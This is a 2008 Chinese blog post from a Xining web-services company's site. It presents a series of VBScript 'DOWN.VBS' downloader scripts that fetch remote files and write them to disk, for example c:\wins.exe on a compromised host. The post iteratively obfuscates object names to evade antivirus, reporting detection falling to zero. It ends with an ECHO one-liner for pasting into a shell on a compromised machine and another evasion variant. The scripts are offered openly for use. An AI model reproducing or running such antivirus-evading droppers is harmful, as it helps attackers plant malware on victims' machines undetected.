青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 脚本安全 >> 正文  
[原创]孤行一鬼的免杀DOWN.VBS下载脚本

文章来源: 西宁威势电子信息服务有限公司     发布时间:2008-11-11    浏览次数:9218    tags:down.vbs VBS下载脚本

        以前一直用网上下载的DOWN.VBS,可能是用的人太多的原因吧,好长时间没有玩了,这次拿出来用的时候,尽然被 瑞星给挂了,所以自己花了几分钟时间,写了一个,原代码如下:

Set xml = CreateObject("Microsoft.XMLHTTP"):xml.Open "GET",http://www.qhwins.com/tools/tools.rar,False:xml.Send:with CreateObject("ADODB.Stream") :.type=1:.open:.write xml.responseBody:.savetofile "c:\wins.exe",2:end with:set xml=Nothing
写完后在线进行多种病毒软件的扫描查杀,结果如下:


文件 d1.vbs 接收于 2008.11.07 15:40:55 (CET)
当前状态: 正在读取 ... 队列中 等待中 扫描中 完成 未发现 停止

结果: 11/35 (31.43%)

依然有11个杀毒软件会查杀,再来

上面的脚本运行后会从URL中下载文件,并保存到肉机的C:\WINS.EXE,用起来还要改名,使用不太顺手,再改进一下
写成函数,一次可下载多个文件的
function GetHttpFile(url)
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET",url,False
xml.Send
with CreateObject("ADODB.Stream")
.type=1
.open
.write xml.responseBody
.savetofile ".\"&FileName,2
end with
set xml=Nothing
end function
GetHttpFile("http://www.qhwins.com/tools/tools.rar")
GetHttpFile("http://www.qhwins.com/images/logo.jpg")

嗯,文件成功下载,且文件名也被保持,不错!
呵呵,再在线扫描一下,TNND,还有6款杀软会杀,包括KBSJ,KBSJ这方面确实挺强悍的,瑞星早就查不出来了,呵呵
不怕,我再变,下面再给出一个免杀改进版
function GetHttpFile(url)
    dim m,s
m="Microsoft.XMLHTTP"
s="ADODB.Stream"
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject(m)
xml.Open "GET",url,False
xml.Send
with CreateObject(s)
.type=1
.open
.write xml.responseBody
.savetofile ".\"&FileName,2
end with
set xml=Nothing
end function
GetHttpFile("http://www.qhwins.com/tools/tools.rar")
GetHttpFile("http://www.qhwins.com/images/logo.jpg")

还有两款杀软放不过,不过对付市面上的杀软,已经是游刃有余了,再次变形,

function GetHttpFile(url)
    dim m,s
m="M_i_c_r_osoft.X_M_L_H_T_T_P"
s="A_D_O_D_B_._S_t_r_e_a_m"
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject(m)
.......
end function
GetHttpFile(http://www.qhwins.com/tools/tools.rar)
GetHttpFile("http://www.qhwins.com/images/logo.jpg")

OK,在线扫描后发现逃过所有的杀毒软件,KBSJ也低头了,嘿嘿,爽,为了使用方便,我再给出一个ECHO版的,这样我们在CMDSHELL中直接粘,贴就可以使用了,方便
ECHO版的如下:

以下是引用片段:
ECHO function GetHttpFile(url):dim m,s:m="M_i_c_r_osoft.X_M_L_H_T_T_P":s="A_D_O_D_B_._S_t_r_e_a_m":FileName=LCase(mid(url,InStrRev(url, "/")+1)):Set xml = CreateObject(replace(m,"_","")):xml.Open "GET",url,False:xml.Send:with CreateObject(replace(s,"_","")):.type=1:.open:.write xml.responseBody:.savetofile ".\"^&FileName,2:end with:set xml=Nothing:end function:GetHttpFile("http://www.qhwins.com/tools/tools.rar"):GetHttpFile("http://www.qhwins.com/images/logo.jpg")> DOWN.VBS


注意ECHO版的直接用记事本打开,没有任何换行,BS了所有的杀毒软件,OK,拿去玩吧!上面的脚本中,多个下载之间用":"分开就行了,一起可以下载N多个文件。

另外,网上还找到一个使用更方面的,不过逃不过杀软件的查杀,我直接给免我免杀过的吧[在线搜索发现瑞星还会查杀,但是其它杀软都不会有反应了,瑞星的免杀起来也很简单,我就不花时间了,大家自己搞定吧!]

以下是引用片段:
URL = LCase(WScript.Arguments(0))
dim m,s
m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P"
s="A=D=O=DB=.=S=t=r=e=a=m"
set cmd =Createobject(replace(m,"^",""))
cmd.Open "GET",URL,0
cmd.Send()
FileName=LCase(mid(URL,InStrRev(URL, "/")+1))
Set CsCriptGet = Createobject(replace(s,"=",""))
CsCriptGet.Mode = 3
CsCriptGet.Type = 1
CsCriptGet.Open()
CsCriptGet.Write(cmd.responseBody)
CsCriptGet.SaveToFile FileName,2


上一篇:[原创]孤行一鬼教你怎么样防注入
下一篇:cookies防注入
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话:09718235355 13897410341    WEB-FAX:1183309-7112964    MSN:cmdshell@hotmail.cn 邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全